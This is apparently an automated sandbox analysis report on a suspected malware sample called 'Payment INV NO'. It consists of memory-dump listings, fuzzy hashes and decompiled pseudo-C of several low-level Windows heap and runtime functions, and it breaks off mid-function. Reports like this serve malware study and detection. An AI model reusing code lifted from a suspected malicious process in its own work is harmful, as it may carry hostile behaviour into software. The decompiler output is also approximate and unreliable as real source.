                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ac95412846cd75c7ef8d6dd8fce16e45595f4584a238914f17aa5f18efe1302f
                                                          • Instruction ID: 18eba00ae21dbfac90bd03b4467737366df375e3dddc6733061fc53ecf3122ee
                                                          • Opcode Fuzzy Hash: ac95412846cd75c7ef8d6dd8fce16e45595f4584a238914f17aa5f18efe1302f
                                                          • Instruction Fuzzy Hash: C641E139900217DBCF14DFA8D840AEDFBB5BF48620F55419AE805E7340D7348D59CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017C4D3B Relevance: .1, Instructions: 131COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 78%
                                                          			E017C4D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				signed char _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				signed char _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x188d360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E017DFA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x1887bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E017DB0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = E017B4620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E0179CCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E017DB640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E017DF380(_t67 + 0xc, 0x1775138, 0x10) == 0) {
								 *0x18860d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E017C4F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E017C4E70(0x18886b0, 0x17c5690, 0, 0) != 0) {
					_t46 = E0179CCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}




















                                                          0x017c4d3b
                                                          0x017c4d4d
                                                          0x017c4d53
                                                          0x017c4d58
                                                          0x017c4d65
                                                          0x017c4d6c
                                                          0x017c4d71
                                                          0x017c4d77
                                                          0x017c4d7f
                                                          0x017c4d8c
                                                          0x017c4d8e
                                                          0x017c4dad
                                                          0x017c4db0
                                                          0x017c4db7
                                                          0x017c4db8
                                                          0x017c4db9
                                                          0x017c4dba
                                                          0x017c4dbb
                                                          0x017c4dc1
                                                          0x017c4dc8
                                                          0x017c4dcc
                                                          0x017c4dd5
                                                          0x017c4dde
                                                          0x017c4ddf
                                                          0x017c4de0
                                                          0x017c4de1
                                                          0x017c4de6
                                                          0x017c4de7
                                                          0x017c4de9
                                                          0x017c4df3
                                                          0x00000000
                                                          0x00000000
                                                          0x01806c7c
                                                          0x01806c8a
                                                          0x01806c8a
                                                          0x01806c9d
                                                          0x01806ca7
                                                          0x01806cac
                                                          0x01806cb2
                                                          0x01806cb9
                                                          0x00000000
                                                          0x01806cbf
                                                          0x01806cbf
                                                          0x00000000
                                                          0x01806cbf
                                                          0x01806cb9
                                                          0x017c4dfb
                                                          0x01806ccf
                                                          0x01806cd3
                                                          0x017c4e32
                                                          0x017c4e39
                                                          0x01806ce0
                                                          0x01806cf2
                                                          0x01806cf2
                                                          0x01806ce0
                                                          0x017c4e3f
                                                          0x017c4e41
                                                          0x017c4e51
                                                          0x017c4e51
                                                          0x017c4e03
                                                          0x017c4e03
                                                          0x017c4e09
                                                          0x017c4e0f
                                                          0x017c4e57
                                                          0x00000000
                                                          0x00000000
                                                          0x017c4e1b
                                                          0x017c4e30
                                                          0x017c4e5b
                                                          0x017c4e5b
                                                          0x00000000
                                                          0x017c4e30
                                                          0x017c4e11
                                                          0x017c4e11
                                                          0x017c4e16
                                                          0x00000000
                                                          0x017c4e16
                                                          0x017c4e01
                                                          0x00000000
                                                          0x017c4e01
                                                          0x017c4da5
                                                          0x01806c6b
                                                          0x00000000
                                                          0x017c4dab
                                                          0x017c4dab
                                                          0x00000000
                                                          0x017c4dab

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a2def7d0d23f67f5f8d2cf85d67623e07ab950e7934685f52be390926c78c920
                                                          • Instruction ID: 292017d364120a14b1d48f483d914f3aa685b4f9887114e92f39e803d3768387
                                                          • Opcode Fuzzy Hash: a2def7d0d23f67f5f8d2cf85d67623e07ab950e7934685f52be390926c78c920
                                                          • Instruction Fuzzy Hash: CA41B171A403189FEB22DF18CC94FAAFBB9EB45B10F05009DE9469B285D774DE44CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017BF86D Relevance: .1, Instructions: 124COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 93%
                                                          			E017BF86D(void* __ebx, signed int __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t31;
				signed int _t40;
				signed int _t45;
				signed int _t46;
				signed int _t48;
				signed int _t50;
				signed int _t53;
				unsigned int* _t60;
				signed int* _t66;
				signed int _t67;
				signed int* _t70;
				void* _t71;

				_t64 = __edx;
				_t61 = __ecx;
				_push(0x1c);
				_push(0x186feb8);
				E017ED08C(__ebx, __edi, __esi);
				_t60 = __edx;
				 *((intOrPtr*)(_t71 - 0x28)) = __edx;
				_t70 = __ecx;
				 *((intOrPtr*)(_t71 - 0x2c)) = __ecx;
				_t66 =  *(_t71 + 8);
				if(_t66 == 0 || __ecx == 0 || __edx == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					L018688F5(_t60, _t61, _t64, _t66, _t70, __eflags);
					_t31 = 0xc000000d;
					goto L9;
				} else {
					if( *__ecx == 0) {
						L10:
						 *(_t71 - 0x20) =  *(_t71 - 0x20) & 0x00000000;
						_t67 = E017C3E70(_t71 - 0x20, 0);
						 *(_t71 - 0x24) = _t67;
						__eflags = _t67;
						if(_t67 < 0) {
							L24:
							_t31 = _t67;
							L9:
							return E017ED0D1(_t31);
						}
						E017B2280(_t36, _t60);
						 *(_t71 - 4) = 1;
						__eflags =  *_t70;
						if( *_t70 != 0) {
							asm("lock inc dword [eax]");
							L21:
							 *(_t71 - 4) = 0xfffffffe;
							E017BF9DD(_t60);
							_t40 =  *(_t71 - 0x20);
							__eflags = _t40;
							if(__eflags != 0) {
								_push(_t40);
								E01799100(_t60, _t61, _t67, _t70, __eflags);
							}
							__eflags = _t67;
							if(_t67 >= 0) {
								 *( *(_t71 + 8)) =  *_t70;
							}
							goto L24;
						}
						__eflags = _t70 - 0x18886c0;
						if(_t70 != 0x18886c0) {
							__eflags = _t70 - 0x18886b8;
							if(_t70 != 0x18886b8) {
								L20:
								 *_t70 =  *(_t71 - 0x20);
								_t20 = _t71 - 0x20;
								 *_t20 =  *(_t71 - 0x20) & 0x00000000;
								__eflags =  *_t20;
								goto L21;
							}
							E017C5AA0(_t61,  *(_t71 - 0x20), 1);
							_t45 = E017995F0( *(_t71 - 0x20), 1);
							L27:
							_t67 = _t45;
							__eflags = _t67;
							 *(_t71 - 0x24) = _t67;
							if(_t67 >= 0) {
								goto L20;
							}
							goto L21;
						}
						_t46 =  *0x1888754; // 0x0
						__eflags = _t46;
						if(_t46 != 0) {
							E017C5AA0(_t61,  *(_t71 - 0x20), _t46);
						} else {
							_t50 =  *0x7ffe03c0 << 3;
							__eflags = _t50 - 0x300;
							if(_t50 < 0x300) {
								_t50 = 0x300;
							}
							E017C5AA0(0x300,  *(_t71 - 0x20), _t50);
							_t53 =  *0x7ffe03c0 << 2;
							_t61 = 0x180;
							__eflags = _t53 - 0x180;
							if(_t53 < 0x180) {
								_t53 = 0x180;
							}
							E017D5C70( *(_t71 - 0x20), _t53);
						}
						_t48 =  *0x1888750; // 0x0
						__eflags = _t48;
						if(_t48 != 0) {
							_t45 = E0179B8F0( *(_t71 - 0x20), _t48);
							goto L27;
						} else {
							goto L20;
						}
					}
					 *((char*)(_t71 - 0x19)) = 0;
					E017BFAD0(__edx);
					 *(_t71 - 4) =  *(_t71 - 4) & 0x00000000;
					if( *_t70 != 0) {
						asm("lock inc dword [eax]");
						 *_t66 =  *_t70;
						 *((char*)(_t71 - 0x19)) = 1;
					}
					 *(_t71 - 4) = 0xfffffffe;
					E017BF9D6(_t60);
					if( *((char*)(_t71 - 0x19)) == 0) {
						goto L10;
					} else {
						_t31 = 0;
						goto L9;
					}
				}
			}















                                                          0x017bf86d
                                                          0x017bf86d
                                                          0x017bf86d
                                                          0x017bf86f
                                                          0x017bf874
                                                          0x017bf879
                                                          0x017bf87b
                                                          0x017bf87e
                                                          0x017bf880
                                                          0x017bf883
                                                          0x017bf888
                                                          0x018047c9
                                                          0x018047ce
                                                          0x00000000
                                                          0x017bf8b1
                                                          0x017bf8b4
                                                          0x017bf8f1
                                                          0x017bf8f1
                                                          0x017bf900
                                                          0x017bf902
                                                          0x017bf905
                                                          0x017bf907
                                                          0x017bf9a9
                                                          0x017bf9a9
                                                          0x017bf8e9
                                                          0x017bf8ee
                                                          0x017bf8ee
                                                          0x017bf90e
                                                          0x017bf913
                                                          0x017bf91c
                                                          0x017bf91e
                                                          0x017bf9e4
                                                          0x017bf98b
                                                          0x017bf98b
                                                          0x017bf992
                                                          0x017bf997
                                                          0x017bf99a
                                                          0x017bf99c
                                                          0x017bf9e9
                                                          0x017bf9ea
                                                          0x017bf9ea
                                                          0x017bf99e
                                                          0x017bf9a0
                                                          0x017bf9a7
                                                          0x017bf9a7
                                                          0x00000000
                                                          0x017bf9a0
                                                          0x017bf924
                                                          0x017bf92a
                                                          0x017bf9b0
                                                          0x017bf9b6
                                                          0x017bf982
                                                          0x017bf985
                                                          0x017bf987
                                                          0x017bf987
                                                          0x017bf987
                                                          0x00000000
                                                          0x017bf987
                                                          0x017bf9be
                                                          0x017bf9c6
                                                          0x017bf9cb
                                                          0x017bf9cb
                                                          0x017bf9cd
                                                          0x017bf9cf
                                                          0x017bf9d2
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017bf9d4
                                                          0x017bf930
                                                          0x017bf935
                                                          0x017bf937
                                                          0x018047a3
                                                          0x017bf93d
                                                          0x017bf942
                                                          0x017bf94a
                                                          0x017bf94c
                                                          0x017bf94e
                                                          0x017bf94e
                                                          0x017bf954
                                                          0x017bf95e
                                                          0x017bf961
                                                          0x017bf966
                                                          0x017bf968
                                                          0x017bf96a
                                                          0x017bf96a
                                                          0x017bf970
                                                          0x017bf970
                                                          0x017bf975
                                                          0x017bf97a
                                                          0x017bf97c
                                                          0x018047b1
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017bf97c
                                                          0x017bf8b6
                                                          0x017bf8bb
                                                          0x017bf8c0
                                                          0x017bf8c8
                                                          0x017bf8ca
                                                          0x017bf8cf
                                                          0x017bf8d1
                                                          0x017bf8d1
                                                          0x017bf8d5
                                                          0x017bf8dc
                                                          0x017bf8e5
                                                          0x00000000
                                                          0x017bf8e7
                                                          0x017bf8e7
                                                          0x00000000
                                                          0x017bf8e7
                                                          0x017bf8e5

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d452d28d1c5e24b8702b7f37e3adfe3b53b9db6bb2af2d515ed93c90e1315636
                                                          • Instruction ID: 58e2beab0809cf3d2869695b61d8e48254554e21c1185821e9d76a1445300041
                                                          • Opcode Fuzzy Hash: d452d28d1c5e24b8702b7f37e3adfe3b53b9db6bb2af2d515ed93c90e1315636
                                                          • Instruction Fuzzy Hash: 7241A3B1A0020AEFEB229FACCC88BEDF7B5BF58B14F14041DE640E7251D77599408B90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01791AA0 Relevance: .1, Instructions: 123COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 11aa80faa9ae5028334b44e9e7089ac2ca8acbc577ae78e613c37a044f3b3e8b
                                                          • Instruction ID: 64abceffda8d60bf6cfaa94c41b7c5aa65c6514133a0d669a024f859fda44e04
                                                          • Opcode Fuzzy Hash: 11aa80faa9ae5028334b44e9e7089ac2ca8acbc577ae78e613c37a044f3b3e8b
                                                          • Instruction Fuzzy Hash: CA413F71A00606EFDB24CF99D980AAAFBF9FF18310B5085ADE556D7650E330EA58CB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017A0100 Relevance: .1, Instructions: 122COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 69%
                                                          			E017A0100(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t37;
				char _t38;
				intOrPtr _t42;
				signed int* _t43;
				signed int _t44;
				signed int _t48;
				char _t59;
				intOrPtr* _t61;
				signed char _t62;
				signed int _t65;
				intOrPtr _t67;
				signed int _t70;
				signed int _t72;
				void* _t73;

				_push(0x1c);
				_push(0x186f848);
				_t37 = E017ED08C(__ebx, __edi, __esi);
				_t59 = 0;
				 *((char*)(_t73 - 0x19)) = 0;
				if( *((intOrPtr*)(_t73 + 8)) == 0) {
					_t38 = 0;
					L7:
					return E017ED0D1(_t38);
				}
				E017B2280(_t37, 0x188861c);
				 *(_t73 - 4) =  *(_t73 - 4) & 0x00000000;
				_t72 =  *0x1886da4; // 0x0
				if(_t72 == 0) {
					_t59 = 1;
					L26:
					 *((char*)(_t73 - 0x19)) = _t59;
					L6:
					 *(_t73 - 4) = 0xfffffffe;
					E017A021A();
					_t38 = _t59;
					goto L7;
				}
				_t70 = _t72;
				 *(_t73 - 0x24) = _t70;
				_t42 =  *0x1886da0; // 0x0
				 *((intOrPtr*)(_t73 - 0x20)) = _t42;
				while(_t70 > 0) {
					_t65 = _t70 << 5;
					if( *((intOrPtr*)(_t65 + _t42 - 0x1c)) ==  *((intOrPtr*)(_t73 + 8))) {
						_t12 = _t42 - 0x20; // -32
						_t61 = _t12 + _t65;
						 *((intOrPtr*)(_t73 - 0x28)) = _t61;
						_t14 = _t61 + 0x10; // -16
						_t43 = _t14;
						 *(_t73 - 0x2c) = _t43;
						_t44 =  *_t43;
						if(_t44 == 0) {
							L21:
							_t62 =  *((intOrPtr*)(_t73 - 0x20));
							L16:
							if(_t70 != _t72) {
								_t27 = _t70 - 1; // -1
								E01799FF0(_t27);
							}
							_t72 = _t72 - 1;
							 *0x1886da4 = _t72;
							if(_t72 == 0) {
								E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t62);
								_t42 = 0;
								 *((intOrPtr*)(_t73 - 0x20)) = 0;
								 *0x1886da0 = 0;
								 *0x1886da8 =  *0x1886da8 & 0;
								L32:
								_t70 =  *(_t73 - 0x24);
								_t72 =  *0x1886da4; // 0x0
								L20:
								_t59 = 1;
								 *((char*)(_t73 - 0x19)) = 1;
								goto L5;
							}
							_t48 =  *0x1886da8; // 0x0
							_t49 = _t48 + 0xffffffe0;
							if(_t72 < _t48 + 0xffffffe0) {
								_t42 = E017B8E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t62, _t49 << 5);
								 *((intOrPtr*)(_t73 - 0x20)) = _t42;
								if(_t42 != 0) {
									 *0x1886da0 = _t42;
									 *0x1886da8 =  *0x1886da8 - 0x20;
									goto L32;
								}
								_t59 = 0;
								goto L26;
							}
							_t42 =  *((intOrPtr*)(_t73 - 0x20));
							goto L20;
						}
						_t67 =  *((intOrPtr*)(_t73 + 0xc));
						if(_t67 != 0) {
							if(_t67 !=  *_t61) {
								goto L21;
							}
						}
						if(_t44 == 0xffffffff) {
							goto L21;
						}
						_push(_t44 & 0xfffffffc);
						if( *((intOrPtr*)(_t61 + 0x1c)) == 0xc0000019) {
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							E017B77F0();
							_t70 =  *(_t73 - 0x24);
							_t61 =  *((intOrPtr*)(_t73 - 0x28));
						} else {
							_push(0xffffffff);
							E017D97A0();
						}
						if( *(_t61 + 0x14) != 0) {
							_push( *(_t61 + 0x14));
							E017D95D0();
							 *(_t61 + 0x14) =  *(_t61 + 0x14) & 0x00000000;
						}
						 *( *(_t73 - 0x2c)) =  *( *(_t73 - 0x2c)) & 0x00000000;
						_t72 =  *0x1886da4; // 0x0
						_t62 =  *0x1886da0; // 0x0
